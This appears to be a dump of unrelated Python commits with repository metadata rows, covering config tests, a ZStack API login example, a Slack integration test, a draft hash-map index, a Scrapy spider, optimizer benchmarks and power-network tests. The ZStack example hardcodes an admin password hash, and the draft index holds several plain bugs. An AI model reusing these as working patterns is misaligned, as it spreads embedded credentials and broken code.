SAMPLE_CONF_DIR = os.path.dirname(os.path.realpath(__file__)).split('tests')[0] + 'conf/'
@skipIf(NO_MOCK, NO_MOCK_REASON)
class ConfTest(TestCase):
'''
Validate files in the salt/conf directory.
'''
def test_conf_master_sample_is_commented(self):
'''
The sample config file located in salt/conf/master must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
master_config = SAMPLE_CONF_DIR + 'master'
ret = salt.config._read_conf_file(master_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
master_config
)
)
def test_conf_minion_sample_is_commented(self):
'''
The sample config file located in salt/conf/minion must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
minion_config = SAMPLE_CONF_DIR + 'minion'
ret = salt.config._read_conf_file(minion_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
minion_config
)
)
def test_conf_cloud_sample_is_commented(self):
'''
The sample config file located in salt/conf/cloud must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
cloud_config = SAMPLE_CONF_DIR + 'cloud'
ret = salt.config._read_conf_file(cloud_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
cloud_config
)
)
def test_conf_cloud_profiles_sample_is_commented(self):
'''
The sample config file located in salt/conf/cloud.profiles must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
cloud_profiles_config = SAMPLE_CONF_DIR + 'cloud.profiles'
ret = salt.config._read_conf_file(cloud_profiles_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
cloud_profiles_config
)
)
def test_conf_cloud_providers_sample_is_commented(self):
'''
The sample config file located in salt/conf/cloud.providers must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
cloud_providers_config = SAMPLE_CONF_DIR + 'cloud.providers'
ret = salt.config._read_conf_file(cloud_providers_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
cloud_providers_config
)
)
def test_conf_proxy_sample_is_commented(self):
'''
The sample config file located in salt/conf/proxy must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
proxy_config = SAMPLE_CONF_DIR + 'proxy'
ret = salt.config._read_conf_file(proxy_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
proxy_config
)
)
def test_conf_roster_sample_is_commented(self):
'''
The sample config file located in salt/conf/roster must be completely
commented out. This test checks for any lines that are not commented or blank.
'''
roster_config = SAMPLE_CONF_DIR + 'roster'
ret = salt.config._read_conf_file(roster_config)
self.assertEqual(
ret,
{},
'Sample config file \'{0}\' must be commented out.'.format(
roster_config
)
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ConfTest, needs_daemon=False)
| Python | 0 | |
5f5c98df4349fb31f0311b1fb7f0e6b9092b4b59 | add API example | apibinding/examples/example.py | apibinding/examples/example.py | import httplib
import json
import time
# return a dict containing API return value
def api_call(session_uuid, api_id, api_content):
conn = httplib.HTTPConnection("localhost", 8080)
headers = {"Content-Type": "application/json"}
if session_uuid:
api_content["session"] = {"uuid": session_uuid}
api_body = {api_id: api_content}
conn.request("POST", "/zstack/api", json.dumps(api_body))
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to make an API call, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
job_uuid = rsp["uuid"]
def query_until_done():
conn.request("GET", "/zstack/api/result/%s" % job_uuid)
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to query API result, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
time.sleep(1)
print "Job[uuid:%s] is still in processing" % job_uuid
return query_until_done()
return query_until_done()
def error_if_fail(rsp):
success = rsp.values()[0]["success"]
if not success:
error = rsp.values()[0]["error"]
raise Exception("failed to login, %s" % json.dumps(error))
def login():
content = {
"accountName": "admin",
"password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"
}
rsp = api_call(None, "org.zstack.header.identity.APILogInByAccountMsg", content)
error_if_fail(rsp)
session_uuid = rsp.values()[0]["inventory"]["uuid"]
print "successfully login, session uuid is: %s" % session_uuid
return session_uuid
def create_zone(session_uuid):
content = {"name": "zone1"}
rsp = api_call(session_uuid, "org.zstack.header.zone.APICreateZoneMsg", content)
error_if_fail(rsp)
print "successfully created zone1"
def logout(session_uuid):
content = {"sessionUuid": session_uuid}
rsp = api_call(None, "org.zstack.header.identity.APILogOutMsg", content)
error_if_fail(rsp)
print "successfully logout"
session_uuid = login()
create_zone(session_uuid)
logout(session_uuid)
| Python | 0 | |
01ee5e64093bfd6f6c57c27d189408f2f765f2b4 | Create load_from_numpy.py | load_from_numpy.py | load_from_numpy.py | import os
import torch
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import models
import argparse
import time
import math
parser = argparse.ArgumentParser(description='load_from_numpy.py')
parser.add_argument('-save_model', default='mlstm-ns.pt',
help="""Model filename to save""")
parser.add_argument('-load_model', default='',
help="""Model filename to load""")
parser.add_argument('-train', default='data/input.txt',
help="""Text filename for training""")
parser.add_argument('-valid', default='data/valid.txt',
help="""Text filename for validation""")
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the encoder/decoder')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=128,
help='Size of embeddings')
parser.add_argument('-seq_length', type=int, default=20,
help="Maximum sequence length")
parser.add_argument('-batch_size', type=int, default=64,
help='Maximum batch size')
parser.add_argument('-learning_rate', type=float, default=0.001,
help="""Starting learning rate.""")
parser.add_argument('-dropout', type=float, default=0.0,
help='Dropout probability.')
parser.add_argument('-param_init', type=float, default=0.05,
help="""Parameters are initialized over uniform distribution
with support (-param_init, param_init)""")
parser.add_argument('-clip', type=float, default=5,
help="""Clip gradients at this value.""")
parser.add_argument('--seed', type=int, default=1234,
help='random seed')
# GPU
parser.add_argument('-cuda', action='store_true',
help="Use CUDA")
opt = parser.parse_args()
embed = nn.Embedding(256, opt.embed_size)
rnn = models.StackedLSTM(models.mLSTM, opt.layers, opt.embed_size, opt.rnn_size, 256, opt.dropout)
embed.weight.data = torch.from_numpy(np.load("weights/embd.npy"))
rnn.h2o.weight.data = torch.from_numpy(np.load("weights/w.npy")).t()
rnn.h2o.bias.data = torch.from_numpy(np.load("weights/b.npy"))
rnn.layers[0].wx.weight.data = torch.from_numpy(np.load("weights/wx.npy")).t()
rnn.layers[0].wh.weight.data = torch.from_numpy(np.load("weights/wh.npy")).t()
rnn.layers[0].wh.bias.data = torch.from_numpy(np.load("weights/b0.npy"))
rnn.layers[0].wmx.weight.data = torch.from_numpy(np.load("weights/wmx.npy")).t()
rnn.layers[0].wmh.weight.data = torch.from_numpy(np.load("weights/wmh.npy")).t()
checkpoint = {
'rnn': rnn,
'embed': embed,
'opt': opt,
'epoch': 0
}
save_file = opt.save_model
print('Saving to '+ save_file)
torch.save(checkpoint, save_file)
| Python | 0.000005 | |
03123c64835f0a1d4cb16cbc638a432b99cc9d04 | Add a test case for #605 - the issue has been fixed by #606 | integration_tests/rtm/test_issue_605.py | integration_tests/rtm/test_issue_605.py | import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from slack import RTMClient, WebClient
class TestRTMClient_Issue_605(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skip()
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
loop=asyncio.new_event_loop(), # TODO: this doesn't work without this
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread | Python | 0 | |
54a41d23554c16c768a1113d8ad74291ad44bd67 | Add initial distributed hash map index | maras/index/dhm.py | maras/index/dhm.py | '''
A hash based index
'''
# Write sequence:
# 1. Get hash map file and file num
# 2. Write to associated storage file
# 3. Write to associated index file
# 4. Write to associated hash map file
# Import python libs
import struct
import os
# Import maras libs
import maras.utils
# Import third party libs
import msgpack
HEADER_DELIM = '_||_||_'
def calc_position(key, hash_limit, bucket_size, header_len):
'''
Calculate the hash map file's key position
'''
return (abs(hash(key) & hash_limit) * bucket_size) + header_len
class DHM(object):
'''
Distributed Hash Map Index
'''
def __init__(
self,
db_root,
hash_limit=0xfffff,
key_hash='sha1',
header_len=1024,
key_delim='/',
open_fd=512,
flush=True):
self.db_root = db_root
self.hash_limit = hash_limit
self.key_hash = key_hash
self.hash_func, self.key_size = maras.utils.get_hash_data(key_hash)
self.header_len = header_len
self.key_delim = key_delim
self.open_fd = open_fd
self.fds = []
self.maps = {}
self.flush = flush
def _hm_dir(self, key):
'''
Return the hashmap directory
'''
key = key.strip(self.key_delim)
root = key[:key.rfind(self.key_delim)].replace(self.key_delim, os.pathsep)
return os.path.join(self.db_root, root)
def _i_entry(self, key, id_, start, size, type_, prev, **kwargs):
'''
Contruct and return the index data entry as a serialized string
'''
entry = {
'key': key,
'st': start,
'sz': size,
'rev': maras.utils.gen_rev(),
't': type_,
'p': prev,
}
entry.update(kwargs)
if not id_:
entry['id'] = maras.utils.rand_hex_str(self.key_size)
else:
entry['id'] = id_
packed = msgpack.dumps(entry)
p_len = struct.pack('>H', len(packed))
return '{0}{1}'.format(p_len, packed)
def create_h_index(self, fn_):
'''
Create an index at the given location
'''
dirname = os.path.dirname(fn_)
if not os.path.exists(dirname):
os.makedirs(dirname)
header = {
'hash': self.key_hash,
'h_limit': self.hash_limit,
'header_len': self.header_len,
'fmt': self.entry_fmt,
'bucket_size': self.bucket_size,
'entry_map': self.entry_map,
}
header_entry = '{0}{1}'.format(msgpack.dumps(header), HEADER_DELIM)
fp_ = open(fn_, 'r+b')
fp_.write(header_entry)
header['fp'] = fp_
return header
def open_map(self, fn_):
'''
Attempt to open a map file, if the map file does not exist
raise IOError
'''
fp_ = open(fn_, 'r+b')
header = {'fp': fp_}
raw_head = ''
while True:
raw_read = fp_.read(self.header_len)
if not raw_read:
raise ValueError('Hit the end of the index file with no header!')
raw_head += raw_read
if HEADER_DELIM in raw_head:
header.update(
msgpack.loads(
raw_head[:raw_head.find(HEADER_DELIM)]
)
)
return header
def _get_h_entry(self, key, fn_):
'''
Return the hash map entry from the given file name.
If the entry is not present then return None
If the file is not present, create it
'''
if fn_ in self.maps:
map_data = self.maps[fn_]
else:
try:
map_data = self.open_map(fn_)
self.maps[fn_] = map_data
except IOError:
map_data = self.create_h_index(fn_)
self.maps[fn_] = map_data
pos = calc_position(
key,
map_data['h_limit'],
map_data['bucket_size'],
map_data['header_len'])
raw_h_entry = map_data['fp'].read(map_data['bucket_size'])
comps = struct.unpack(map_data['fmt'], raw_h_entry)
ret = {}
if comps[0] == '\0' * len(comps[0]):
return None, map_data
for ind in range(map_data['entry_map']):
ret[map_data['entry_map'][ind]] = comps[ind]
ret['pos'] = pos
return ret, map_data
def hash_map_ref(self, key):
'''
Return the hash map reference data
'''
hmdir = self._hm_dir(key)
f_num = 1
while True:
fn_ = os.path.join(hmdir, 'midx_{0}'.format(f_num))
h_entry, map_data = self._get_h_entry(fn_, key)
if not h_entry:
# This is a new key
break
if key == h_entry[0]:
# Key Collision, go to the next table
break
f_num += 1
return h_entry, map_data
def insert(self, key, id_, start, size, type_, **kwargs):
'''
Insert the data into the specified location
'''
# 1. Get HT file data
# 2. Get HT location
# 3. Construct Index table data
# 4. Write Index table data
# 5. Construct hash table struct
# 6. Write HT struct
h_data, map_data = self.hash_map_ref(key)
i_entry = self._i_entry(
key,
id_,
start,
size,
type_,
h_data.get('prev', None),
**kwargs)
map_data['fp'].seek(0, 2)
i_pos = map_data['fp'].tell()
h_data['prev'] = i_pos
map_data['fp'].write(i_entry)
pack_args = []
for ind in range(map_data['entry_map']):
pack_args.append(h_data[map_data['entry_map'][ind]])
h_entry = struct.pack(map_data[''], *pack_args)
map_data['fp'].seek(h_data['pos'])
map_data['fp'].write(h_entry)
| Python | 0 | |
66d3d329674521c8756a8644f2f0a58824a1ec41 | add spider for ups freight | locations/spiders/ups_freight_service_centers.py | locations/spiders/ups_freight_service_centers.py | # -*- coding: utf-8 -*-
import re
import scrapy
from locations.items import GeojsonPointItem
class UPSFreightServiceCenter(scrapy.Spider):
download_delay = 0.2
name = "ups_freight_service_centers"
allowed_domains = ["upsfreight.com"]
start_urls = (
'https://www.upsfreight.com/ProductsandServices/ServiceCenterDir/default.aspx',
)
def parse_location(self, response):
ref = re.search(r'.+/(.+)', response.url).group(1)
properties = {
'addr_full': response.xpath('//span[contains(@id, "Address")]/text()').extract()[0],
'city': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(',')[0],
'state': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[0],
'postcode': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[1],
'ref': ref,
'website': response.url,
'phone': response.xpath('//span[contains(@id, "Telephone")]/text()').extract()[0],
'name': response.xpath('//span[contains(@id, "lName")]/text()').extract()[0],
'country': ref.split('qcountry=')[1].split('&svc')[0]
}
yield GeojsonPointItem(**properties)
def parse_state(self, response):
location_urls = response.xpath('//*[@id="app_ctl00_scTable_hlDetail"]/@href').extract()
for url in location_urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse(self, response):
urls = response.xpath('//table//table//table//table//table//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_state)
| Python | 0.000001 | |
9311d3d4acd8c67c20d76cc74d00e0f5a83318e6 | add product-of-array-except-self | vol5/product-of-array-except-self/product-of-array-except-self.py | vol5/product-of-array-except-self/product-of-array-except-self.py | class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
ret = [1] * n
product = 1
for i in range(n):
ret[i] = product
product *= nums[i]
product = 1
for i in range(n - 1, -1, -1):
ret[i] *= product
product *= nums[i]
return ret | Python | 0.999376 | |
2c1e5286eca392854bf311e01d1131c45167973f | add coco benchmarking | benchmarks/coco.py | benchmarks/coco.py | """
This benchmark example uses the coco benchmark set of functions
(<http://coco.gforge.inria.fr/>, <https://github.com/numbbo/coco>)
to compare optimizers provided by fluentopt between themselves and also
with CMA-ES[1].
To run these benchmarks, the package 'cocoex' must be installed,
check <https://github.com/numbbo/coco> to see how to install it.
Also, the package 'cma' is needed and can be installed by pip.
For each function, each algorithm is ran for independent trials
and the results are all written in a csv file (by default benchmarks.csv).
each row correspond to a trial for a given algo and function.
The columns are:
- 'func' : function name (str)
- 'algo' : algo name (str)
- 'nbeval' : nb of evaluations performed (int)
- 'ybest' : the best output value found (float)
- 'duration' : duration in seconds (float)
[1] Nikolaus Hansen and Andreas Ostermeier, Completely derandomized
self-adaptation in evolution strategies.
Evolutionary computation, 9(2):159–195, 2001
"""
import time
import numpy as np
import pandas as pd
from cocoex import Suite, Observer
from fluentopt import Bandit
from fluentopt.bandit import ucb_minimize
from fluentopt.transformers import Wrapper
from fluentopt import RandomSearch
from cma import fmin as cma_fmin
from cma import CMAEvolutionStrategy
from clize import run
def cma(fun, budget):
sigma0 = 0.02
range_ = fun.upper_bounds - fun.lower_bounds
center = fun.lower_bounds + range_ / 2
x0 = center
options = dict(
scaling=range_/range_[0],
maxfevals=budget,
verb_log=0,
verb_disp=1,
verbose=1)
es = CMAEvolutionStrategy(x0, sigma0 * range_[0], options)
res = es.optimize(fun).result()
xbest, ybest, nbeval, *rest = res
return xbest, ybest, nbeval
def ucb(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = Bandit(sampler=sampler, score=ucb_minimize, nb_suggestions=100)
return _run_opt(opt, fun, budget)
def random_search(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = RandomSearch(sampler=sampler)
return _run_opt(opt, fun, budget)
def _uniform_sampler(low, high):
low = np.array(low)
high = np.array(high)
dim = len(low)
def sampler_(rng):
return rng.uniform(0, 1, size=dim) * (high - low) + low
return sampler_
def _run_opt(opt, feval, budget):
for _ in range(budget):
x = opt.suggest()
y = feval(x)
opt.update(x=x, y=y)
idx = np.argmin(opt.output_history_)
xbest = opt.input_history_[idx]
ybest = opt.output_history_[idx]
nbeval = budget
return xbest, ybest, nbeval
def main(nb_trials=15, budget_per_dim=100, output='benchmark.csv'):
suite_instance = "year:2016"
suite_name = "bbob"
suite_options = ""
suite = Suite(suite_name, suite_instance, suite_options)
algos = [random_search, cma, ucb]
stats = []
for i, fun in enumerate(suite):
print('Function {}'.format(fun.name))
for algo in algos:
algo_name = algo.__name__
print('Algo : "{}"'.format(algo_name))
for trial in range(nb_trials):
print('Running trial {}...'.format(trial + 1))
t0 = time.time()
xbest, ybest, nbeval = algo(fun, budget_per_dim * fun.dimension)
delta_t = time.time() - t0
stats.append({
'func': fun.id,
'algo': algo_name,
'nbeval': nbeval,
'ybest': ybest,
'duration': delta_t
})
stats = pd.DataFrame(stats)
stats.to_csv(output, index=False)
if __name__ == '__main__':
run(main)
| Python | 0.000001 | |
6ae6544cca07e857d680d199b2c2f436cb1d9a82 | add wordpress stats | wordpress_stats.py | wordpress_stats.py | from utils import *
import urllib, json
import time
import datetime
def dump(blogid,filepath):
posts = []
offset = 0
while True:
puts("offset",offset)
url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/posts?number=100&offset=" + str(offset)
response = urllib.urlopen(url);
data = json.loads(response.read())
for post in data['posts']:
posts.append(post)
if len(data['posts']) < 100:
break
offset += 100
output=open(filepath, 'w+')
content = "<wordpress nfollowers=\"" + "NA" + "\" timestamp=\"" + str(time.time()) + "\">\n"
for post in posts:
puts(post['title'],post['like_count'],post['date'])
content = content + "\t<post name=\"" + post['title'] + "\" \t timestamp=\"" + str(post['date']) + "\" \t fav_count=\"" + str(post['like_count']) + "\"></post>\n"
content = content + "</wordpress>\n"
output.write(content.encode('utf8'))
output.close()
# dump("wordpressexample.xml")
| Python | 0.000001 | |
3a5d29bbdbe60558d5f76e6311635bd340b21a57 | add test_lopf_constraints test | test/test_lopf_constraints.py | test/test_lopf_constraints.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 1 15:20:12 2022
@author: fabian
"""
import pytest
import pandas as pd
from pypsa.descriptors import (
expand_series,
get_switchable_as_dense as get_as_dense,
nominal_attrs,
)
TOLERANCE = 1e-2
def describe_storage_unit_contraints(n):
"""
Checks whether all storage units are balanced over time. This function
requires the network to contain the separate variables p_store and
p_dispatch, since they cannot be reconstructed from p. The latter results
from times tau where p_store(tau) > 0 **and** p_dispatch(tau) > 0, which
is allowed (even though not economic). Therefor p_store is necessarily
equal to negative entries of p, vice versa for p_dispatch.
"""
sus = n.storage_units
sus_i = sus.index
if sus_i.empty:
return
sns = n.snapshots
c = "StorageUnit"
pnl = n.pnl(c)
description = {}
eh = expand_series(n.snapshot_weightings.stores, sus_i)
stand_eff = expand_series(1 - n.df(c).standing_loss, sns).T.pow(eh)
dispatch_eff = expand_series(n.df(c).efficiency_dispatch, sns).T
store_eff = expand_series(n.df(c).efficiency_store, sns).T
inflow = get_as_dense(n, c, "inflow") * eh
spill = eh[pnl.spill.columns] * pnl.spill
description["Spillage Limit"] = pd.Series(
{"min": (inflow[spill.columns] - spill).min().min()}
)
if "p_store" in pnl:
soc = pnl.state_of_charge
store = store_eff * eh * pnl.p_store # .clip(upper=0)
dispatch = 1 / dispatch_eff * eh * pnl.p_dispatch # (lower=0)
start = soc.iloc[-1].where(
sus.cyclic_state_of_charge, sus.state_of_charge_initial
)
previous_soc = stand_eff * soc.shift().fillna(start)
reconstructed = (
previous_soc.add(store, fill_value=0)
.add(inflow, fill_value=0)
.add(-dispatch, fill_value=0)
.add(-spill, fill_value=0)
)
description["SOC Balance StorageUnit"] = (
(reconstructed - soc).unstack().describe()
)
return pd.concat(description, axis=1, sort=False)
def describe_nodal_balance_constraint(n):
"""
Helper function to double check whether network flow is balanced
"""
network_injection = (
pd.concat(
[
n.pnl(c)[f"p{inout}"].rename(columns=n.df(c)[f"bus{inout}"])
for inout in (0, 1)
for c in ("Line", "Transformer")
],
axis=1,
)
.groupby(level=0, axis=1)
.sum()
)
return (
(n.buses_t.p - network_injection)
.unstack()
.describe()
.to_frame("Nodal Balance Constr.")
)
def describe_upper_dispatch_constraints(n):
"""
Recalculates the minimum gap between operational status and nominal capacity
"""
description = {}
key = " Upper Limit"
for c, attr in nominal_attrs.items():
dispatch_attr = "p0" if c in ["Line", "Transformer", "Link"] else attr[0]
description[c + key] = pd.Series(
{
"min": (
n.df(c)[attr + "_opt"] * get_as_dense(n, c, attr[0] + "_max_pu")
- n.pnl(c)[dispatch_attr]
)
.min()
.min()
}
)
return pd.concat(description, axis=1)
def describe_lower_dispatch_constraints(n):
description = {}
key = " Lower Limit"
for c, attr in nominal_attrs.items():
if c in ["Line", "Transformer", "Link"]:
dispatch_attr = "p0"
description[c] = pd.Series(
{
"min": (
n.df(c)[attr + "_opt"] * get_as_dense(n, c, attr[0] + "_max_pu")
+ n.pnl(c)[dispatch_attr]
)
.min()
.min()
}
)
else:
dispatch_attr = attr[0]
description[c + key] = pd.Series(
{
"min": (
-n.df(c)[attr + "_opt"]
* get_as_dense(n, c, attr[0] + "_min_pu")
+ n.pnl(c)[dispatch_attr]
)
.min()
.min()
}
)
return pd.concat(description, axis=1)
def describe_store_contraints(n):
"""
Checks whether all stores are balanced over time.
"""
stores = n.stores
stores_i = stores.index
if stores_i.empty:
return
sns = n.snapshots
c = "Store"
pnl = n.pnl(c)
eh = expand_series(n.snapshot_weightings.stores, stores_i)
stand_eff = expand_series(1 - n.df(c).standing_loss, sns).T.pow(eh)
start = pnl.e.iloc[-1].where(stores.e_cyclic, stores.e_initial)
previous_e = stand_eff * pnl.e.shift().fillna(start)
return (
(previous_e - pnl.p - pnl.e).unstack().describe().to_frame("SOC Balance Store")
)
def describe_cycle_constraints(n):
weightings = n.lines.x_pu_eff.where(n.lines.carrier == "AC", n.lines.r_pu_eff)
def cycle_flow(sub):
C = pd.DataFrame(sub.C.todense(), index=sub.lines_i())
if C.empty:
return None
C_weighted = 1e5 * C.mul(weightings[sub.lines_i()], axis=0)
return C_weighted.apply(lambda ds: ds @ n.lines_t.p0[ds.index].T)
return (
pd.concat([cycle_flow(sub) for sub in n.sub_networks.obj], axis=0)
.unstack()
.describe()
.to_frame("Cycle Constr.")
)
funcs = (
[
describe_cycle_constraints,
# describe_store_contraints,
# describe_storage_unit_contraints,
describe_nodal_balance_constraint,
describe_lower_dispatch_constraints,
describe_upper_dispatch_constraints,
],
)
@pytest.fixture(scope="module")
def solved_network(ac_dc_network):
n = ac_dc_network
n.lopf(pyomo=False)
n.lines["carrier"] = n.lines.bus0.map(n.buses.carrier)
return n
@pytest.mark.parametrize("func", *funcs)
def test_tolerance(solved_network, func):
n = solved_network
description = func(n).fillna(0)
for col in description:
assert abs(description[col]["min"]) < TOLERANCE
if "max" in description:
assert description[col]["max"] < TOLERANCE
| Python | 0.001036 | |
e349a43ad33abf0e6cce2a410e0e6cb2342456f1 | No in Python | 2017-05-06/no.py | 2017-05-06/no.py | print('No!') | Python | 0.999311 | |
9cc09c6143025d88eedfa4f8eedcd23e2fe7990e | Create sahilprakash.py | Python/sahilprakash.py | Python/sahilprakash.py | print("Hello World!")
| Python | 0.000024 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.